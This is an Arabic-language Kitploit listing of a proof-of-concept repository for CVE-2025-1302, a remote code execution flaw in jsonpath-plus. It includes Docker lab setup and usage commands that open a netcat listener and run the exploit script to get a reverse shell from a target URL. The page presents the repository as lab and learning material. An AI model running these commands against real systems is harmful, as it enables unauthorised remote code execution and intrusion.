Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1302 — JSONPath-plus تنفيذ التعليمات البرمجية عن بُعد | Kitploit
أدوات/GitHubGitHub/eqstlab/cve-2025-1302
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubeqstlab/cve-2025-1302

CVE-2025-1302

JSONPath-plus تنفيذ التعليمات البرمجية عن بُعد

عرض المستودع
201منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-1302

★ CVE-2025-1302 JSONPath-plus RCE PoC ★

https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb

إعداد المختبر

root@kitploit:~
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

الوصف

إصدارات الحزمة jsonpath-plus قبل 10.3.0 معرّضة لتنفيذ التعليمات البرمجية عن بُعد (RCE) بسبب عدم كفاية تنقية المدخلات. يمكن للمهاجم تنفيذ تعليمات برمجية عشوائية على النظام من خلال استغلال الاستخدام الافتراضي غير الآمن لوضع eval='safe'. ملاحظة: سبب ذلك هو إصلاح غير مكتمل لثغرة CVE-2024-21534.

طريقة الاستخدام

استنساخ Git

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302

تثبيت الحزم

root@kitploit:~
pip install -r requirements.txt

الأمر

root@kitploit:~
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

المخرجات

image

النتيجة

image

إخلاء مسؤولية

لا يُقصد من هذا المستودع أن يكون أداة استغلال (RCE) لثغرة CVE-2025-1302. الغرض من هذا المشروع هو مساعدة الأشخاص على تعلّم هذه الثغرة، وربما اختبار تطبيقاتهم الخاصة.

رؤية EQST

ننشر تحليلات CVE والبرمجيات الخبيثة مرة واحدة شهريًا. إذا كنت مهتمًا، يرجى متابعة الروابط أدناه للاطلاع على منشوراتنا. https://www.skshieldus.com/eng/business/insight.do

تنزيل الأداة